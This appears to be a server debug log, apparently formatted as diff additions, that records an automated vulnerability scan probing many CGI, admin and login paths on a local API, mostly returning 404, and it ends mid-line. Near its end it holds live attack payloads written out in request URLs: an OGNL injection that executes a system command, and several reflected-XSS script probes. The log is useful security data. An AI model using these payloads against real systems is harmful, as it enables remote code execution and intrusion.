+2022-11-01T23:24:39.329Z debug: [1667345079328, duration: 1] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:44.350Z debug: [1667345084349, duration: 0] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:49.374Z debug: [1667345089372, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:54.395Z debug: [1667345094394, duration: 0] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:24:59.416Z debug: [1667345099415, duration: 0] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:04.439Z debug: [1667345104437, duration: 1] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:09.461Z debug: [1667345109459, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:14.484Z debug: [1667345114480, duration: 4] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:19.501Z debug: [1667345119500, duration: 0] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:24.522Z debug: [1667345124521, duration: 0] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:29.543Z debug: [1667345129541, duration: 1] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:34.563Z debug: [1667345134562, duration: 1] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:39.585Z debug: [1667345139583, duration: 1] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:44.607Z debug: [1667345144606, duration: 0] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:49.624Z debug: [1667345149623, duration: 1] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:54.644Z debug: [1667345154643, duration: 1] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:25:59.665Z debug: [1667345159664, duration: 0] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:04.685Z debug: [1667345164684, duration: 1] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:09.708Z debug: [1667345169707, duration: 0] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:14.728Z debug: [1667345174727, duration: 1] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:19.744Z debug: [1667345179743, duration: 1] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:24.764Z debug: [1667345184763, duration: 0] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:29.785Z debug: [1667345189784, duration: 1] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:34.805Z debug: [1667345194804, duration: 1] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:39.828Z debug: [1667345199827, duration: 1] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:44.849Z debug: [1667345204848, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:49.871Z debug: [1667345209870, duration: 0] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:54.889Z debug: [1667345214888, duration: 1] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:26:59.910Z debug: [1667345219909, duration: 0] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:04.930Z debug: [1667345224929, duration: 1] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:09.951Z debug: [1667345229950, duration: 1] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:14.971Z debug: [1667345234970, duration: 1] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:19.989Z debug: [1667345239988, duration: 1] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:25.012Z debug: [1667345245011, duration: 1] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:30.033Z debug: [1667345250032, duration: 1] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:35.054Z debug: [1667345255052, duration: 1] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:40.073Z debug: [1667345260072, duration: 1] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:45.192Z debug: [1667345265191, duration: 1] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:50.213Z debug: [1667345270213, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:27:55.235Z debug: [1667345275233, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:27:55.241Z debug: [1667345275240, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:28:00.256Z debug: [1667345280255, duration: 1] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:05.278Z debug: [1667345285277, duration: 1] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:10.296Z debug: [1667345290295, duration: 1] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:15.317Z debug: [1667345295316, duration: 0] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:20.334Z debug: [1667345300333, duration: 1] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:25.354Z debug: [1667345305353, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:30.376Z debug: [1667345310375, duration: 1] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:35.403Z debug: [1667345315402, duration: 0] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:40.423Z debug: [1667345320422, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:45.444Z debug: [1667345325443, duration: 0] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:50.558Z debug: [1667345330557, duration: 0] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:28:55.576Z debug: [1667345335575, duration: 1] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.600Z debug: [1667345340599, duration: 1] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.912Z debug: [1667345340910, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:29:00.919Z debug: [1667345340918, duration: 0] GET:/api/officescan/default.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.926Z debug: [1667345340926, duration: 0] GET:/api/officescan/default_SMB.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.954Z debug: [1667345340953, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:29:00.960Z debug: [1667345340959, duration: 1] GET:/api/officescan/default.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.966Z debug: [1667345340965, duration: 0] GET:/api/officescan/default_SMB.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.988Z debug: [1667345340986, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:29:00.993Z debug: [1667345340993, duration: 0] GET:/api/officescan/default.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:00.999Z debug: [1667345340998, duration: 1] GET:/api/officescan/default_SMB.htm, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:01.057Z debug: [1667345341056, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:29:01.063Z debug: [1667345341062, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:29:05.651Z debug: [1667345345650, duration: 1] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:10.680Z debug: [1667345350679, duration: 1] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:15.824Z debug: [1667345355823, duration: 1] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:21.140Z debug: [1667345361139, duration: 1] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:26.225Z debug: [1667345366224, duration: 0] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:31.246Z debug: [1667345371245, duration: 1] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:36.266Z debug: [1667345376266, duration: 0] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:41.286Z debug: [1667345381285, duration: 0] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:46.307Z debug: [1667345386306, duration: 1] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:51.331Z debug: [1667345391330, duration: 0] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:29:56.350Z debug: [1667345396349, duration: 0] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:01.376Z debug: [1667345401375, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:06.396Z debug: [1667345406395, duration: 1] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:11.415Z debug: [1667345411414, duration: 1] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:16.435Z debug: [1667345416434, duration: 1] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:22.210Z debug: [1667345422209, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:27.230Z debug: [1667345427229, duration: 0] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:32.250Z debug: [1667345432249, duration: 1] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:37.275Z debug: [1667345437274, duration: 0] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:42.298Z debug: [1667345442297, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:47.320Z debug: [1667345447319, duration: 0] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:52.338Z debug: [1667345452338, duration: 0] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:30:57.358Z debug: [1667345457357, duration: 0] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:02.377Z debug: [1667345462376, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:07.402Z debug: [1667345467402, duration: 0] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:12.426Z debug: [1667345472425, duration: 1] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:17.446Z debug: [1667345477445, duration: 1] GET:/api/cgi-bin/status.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:23.077Z debug: [1667345483076, duration: 1] GET:/api/cgi-bin/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:28.096Z debug: [1667345488095, duration: 0] GET:/api/cgi-bin/test.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:33.116Z debug: [1667345493115, duration: 0] GET:/api/cgi-bin/test-cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:38.138Z debug: [1667345498137, duration: 0] GET:/api/cgi-bin/upload.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:43.156Z debug: [1667345503155, duration: 1] GET:/api/cgi-bin/urlcount.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:48.174Z debug: [1667345508174, duration: 0] GET:/api/cgi-bin/viewcvs.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:53.194Z debug: [1667345513193, duration: 0] GET:/api/cgi-bin/wa, reqOrigin: ::1, resCode: 404 +2022-11-01T23:31:58.213Z debug: [1667345518212, duration: 1] GET:/api/cgi-bin/wa.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:03.233Z debug: [1667345523232, duration: 1] GET:/api/cgi-bin/wa.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:08.254Z debug: [1667345528253, duration: 0] GET:/api/cgi-bin/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:13.277Z debug: [1667345533276, duration: 0] GET:/api/cgi-bin-sdb/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:18.297Z debug: [1667345538296, duration: 1] GET:/api/cgi-mod/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:23.806Z debug: [1667345543804, duration: 1] GET:/api/cgi-sys/defaultwebpage.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:28.826Z debug: [1667345548825, duration: 1] GET:/api/cgi-sys/entropysearch.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:33.847Z debug: [1667345553846, duration: 0] GET:/api/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:38.866Z debug: [1667345558865, duration: 1] GET:/api/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:43.889Z debug: [1667345563888, duration: 0] GET:/api/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:48.910Z debug: [1667345568909, duration: 1] GET:/api/nph-mr.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:53.930Z debug: [1667345573929, duration: 1] GET:/api/query.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:32:58.951Z debug: [1667345578950, duration: 1] GET:/api/session_login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:03.973Z debug: [1667345583972, duration: 1] GET:/api/show_bug.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:08.994Z debug: [1667345588993, duration: 0] GET:/api/test, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:14.056Z debug: [1667345594056, duration: 0] GET:/api/test.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:19.078Z debug: [1667345599077, duration: 0] GET:/api/ucsm/isSamInstalled.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:24.497Z debug: [1667345604496, duration: 1] GET:/api/whois.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:29.516Z debug: [1667345609515, duration: 0] GET:/api/wp-login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:34.536Z debug: [1667345614535, duration: 1] GET:/api/wwwadmin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:39.556Z debug: [1667345619555, duration: 0] GET:/api/wwwboard.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:44.577Z debug: [1667345624576, duration: 0] GET:/api/xampp/cgi.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:49.599Z debug: [1667345629597, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:33:49.606Z debug: [1667345629604, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:33:54.620Z debug: [1667345634620, duration: 0] GET:/api/_mt/mt.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:33:59.642Z debug: [1667345639641, duration: 1] GET:/api/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:04.667Z debug: [1667345644666, duration: 1] GET:/api/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:09.699Z debug: [1667345649698, duration: 0] GET:/api/buglist.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:14.758Z debug: [1667345654757, duration: 1] GET:/api/cgi/mid.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:19.807Z debug: [1667345659806, duration: 1] GET:/api/cgi-bin/admin, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:25.154Z debug: [1667345665151, duration: 2] GET:/api/cgi-bin/admin.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:30.177Z debug: [1667345670176, duration: 1] GET:/api/cgi-bin/admin.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:35.196Z debug: [1667345675195, duration: 0] GET:/api/cgi-bin/administrator, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:40.215Z debug: [1667345680214, duration: 0] GET:/api/cgi-bin/administrator.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:45.235Z debug: [1667345685234, duration: 1] GET:/api/cgi-bin/agorn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:50.255Z debug: [1667345690254, duration: 1] GET:/api/cgi-bin/bugreport.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:34:55.277Z debug: [1667345695276, duration: 1] GET:/api/cgi-bin/cart.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:00.299Z debug: [1667345700298, duration: 1] GET:/api/cgi-bin/clwarn.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:05.322Z debug: [1667345705321, duration: 1] GET:/api/cgi-bin/count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:10.345Z debug: [1667345710344, duration: 0] GET:/api/cgi-bin/Count.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:15.366Z debug: [1667345715365, duration: 0] GET:/api/cgi-bin/faqmanager.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:20.401Z debug: [1667345720400, duration: 1] GET:/api/cgi-bin/FormHandler.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:25.693Z debug: [1667345725692, duration: 0] GET:/api/cgi-bin/FormMail.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:30.725Z debug: [1667345730724, duration: 1] GET:/api/cgi-bin/guestbook.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:35.821Z debug: [1667345735820, duration: 1] GET:/api/cgi-bin/help.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:40.840Z debug: [1667345740839, duration: 1] GET:/api/cgi-bin/hi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:45.859Z debug: [1667345745859, duration: 0] GET:/api/cgi-bin/index.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:50.881Z debug: [1667345750880, duration: 1] GET:/api/cgi-bin/index.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:35:55.902Z debug: [1667345755901, duration: 0] GET:/api/cgi-bin/index.sh, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:00.923Z debug: [1667345760922, duration: 0] GET:/api/cgi-bin/login.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:05.944Z debug: [1667345765943, duration: 0] GET:/api/cgi-bin/mailit.pl, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:10.963Z debug: [1667345770962, duration: 1] GET:/api/cgi-bin/mt/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:15.983Z debug: [1667345775982, duration: 1] GET:/api/cgi-bin/mt/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:21.002Z debug: [1667345781002, duration: 0] GET:/api/cgi-bin/mt-static/mt-check.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:26.247Z debug: [1667345786246, duration: 1] GET:/api/cgi-bin/mt-static/mt-load.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:31.271Z debug: [1667345791270, duration: 1] GET:/api/cgi-bin/ncbook/book.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:36.296Z debug: [1667345796295, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:41.317Z debug: [1667345801316, duration: 1] GET:/api/cgi-bin/printenv.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:46.340Z debug: [1667345806339, duration: 1] GET:/api/cgi-bin/quickstore.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:51.374Z debug: [1667345811373, duration: 1] GET:/api/cgi-bin/search, reqOrigin: ::1, resCode: 404 +2022-11-01T23:36:56.398Z debug: [1667345816396, duration: 1] GET:/api/cgi-bin/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:37:01.426Z debug: [1667345821425, duration: 1] GET:/api/cgi-bin/search/search.cgi, reqOrigin: ::1, resCode: 404 +2022-11-01T23:37:06.455Z debug: [1667345826454, duration: 1] GET:/api/cgi-bin/status, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:20.108Z debug: [1667345960104, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:39:20.137Z debug: [1667345960136, duration: 0] GET:/api/ords/, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:20.158Z debug: [1667345960157, duration: 0] GET:/api/apex/listenerConfigure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:34.165Z debug: [1667345974163, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:39:34.167Z debug: [1667345974164, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:39:34.172Z debug: [1667345974171, duration: 1] GET:/api/SMB/console/html/cgi/cgiChkMasterPwd.exe, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:34.177Z debug: [1667345974176, duration: 0] GET:/api/WebApp/widget/repository/widgetPool/wp1/widgetBase/modTMLS/app/olh/tmcm_about.html, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:34.183Z debug: [1667345974182, duration: 0] GET:/api/webapp/login.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:34.566Z debug: [1667345974564, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:39:34.582Z debug: [1667345974581, duration: 1] GET:/api/login.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:39:35.030Z debug: [1667345975026, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.145Z debug: [1667346041143, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.162Z debug: [1667346041162, duration: 0] GET:/api/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=!(%23_memberAccess%5B'allowStaticMethodAccess'%5D=true),(@java.lang.Runtime@getRuntime()).exec('ipconfig').waitFor()%7D.action, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.192Z debug: [1667346041191, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.199Z debug: [1667346041198, duration: 1] POST:/api/flex2gateway/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.200Z debug: [1667346041197, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.210Z debug: [1667346041209, duration: 1] POST:/api/flex2gateway/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.212Z debug: [1667346041211, duration: 0] GET:/api/internalServerReporting.php, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.218Z debug: [1667346041215, duration: 1] POST:/api/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.222Z debug: [1667346041222, duration: 0] POST:/api/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.229Z debug: [1667346041228, duration: 0] POST:/api/blazeds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.236Z debug: [1667346041234, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.237Z debug: [1667346041236, duration: 1] POST:/api/blazeds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.242Z debug: [1667346041241, duration: 1] GET:/api/admin/statistics/ConfigureStatistics, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.243Z debug: [1667346041242, duration: 1] POST:/api/lcds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.250Z debug: [1667346041249, duration: 1] POST:/api/lcds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.264Z debug: [1667346041263, duration: 0] POST:/api/flex2gateway/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.271Z debug: [1667346041270, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.273Z debug: [1667346041273, duration: 0] POST:/api/flex2gateway/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.280Z debug: [1667346041279, duration: 1] GET:/api/Websense/cgi-bin/WsCgiLogin.exe?Page=login&UserName=nessus%22%3e%3cscript%3ealert('websense_username_xss.nasl')%3c%2fscript%3e, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.282Z debug: [1667346041281, duration: 0] POST:/api/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.282Z debug: [1667346041279, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.288Z debug: [1667346041287, duration: 0] POST:/api/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.289Z debug: [1667346041288, duration: 0] GET:/api/webhost, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.294Z debug: [1667346041293, duration: 1] POST:/api/blazeds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.303Z debug: [1667346041303, duration: 0] POST:/api/blazeds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.309Z debug: [1667346041309, duration: 0] POST:/api/lcds/messagebroker/http, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.313Z debug: [1667346041312, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.319Z debug: [1667346041317, duration: 2] POST:/api/lcds/messagebroker/httpsecure, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.321Z debug: [1667346041320, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.323Z debug: [1667346041322, duration: 1] GET:/api/console/faces/com_sun_web_ui/help/masthead.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.328Z debug: [1667346041327, duration: 1] GET:/api/?">, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.331Z debug: [1667346041330, duration: 1] GET:/api/console/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=%3c/title%3e%3cscript%3ealert(%27sun_java_web_console_helpwindow_xss.nasl%27)%3c/script%3e, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.364Z debug: [1667346041363, duration: 0] GET:/api/_mem_bin/formslogin.asp?url=>, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.385Z debug: [1667346041383, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.386Z debug: [1667346041384, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.391Z debug: [1667346041391, duration: 0] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.393Z debug: [1667346041392, duration: 0] GET:/api/home.jsf?autoScroll=0%2c275)%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert('myfaces_tomahawk_autoscroll_xss.nasl', reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.427Z debug: [1667346041426, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.439Z debug: [1667346041438, duration: 1] GET:/api/index.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.440Z debug: [1667346041438, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-11-01T23:40:41.445Z debug: [1667346041445, duration: 0] GET:/api/Default.aspx, reqOrigin: ::1, resCode: 404 +2022-11-01T23:40:41.446Z debug: [1667346041445, duration: 1] 